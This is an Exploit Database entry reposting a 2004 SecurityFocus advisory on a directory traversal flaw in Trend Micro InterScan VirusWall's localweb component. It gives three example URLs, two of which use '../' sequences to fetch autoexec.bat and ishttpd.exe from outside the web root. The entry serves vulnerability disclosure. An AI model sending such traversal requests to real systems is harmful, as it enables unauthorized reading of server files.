Trend Micro Interscan VirusWall localweb - Directory Traversal

EDB-ID:

23875




Platform:

Windows

Date:

2004-03-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/9966/info

It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.

http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe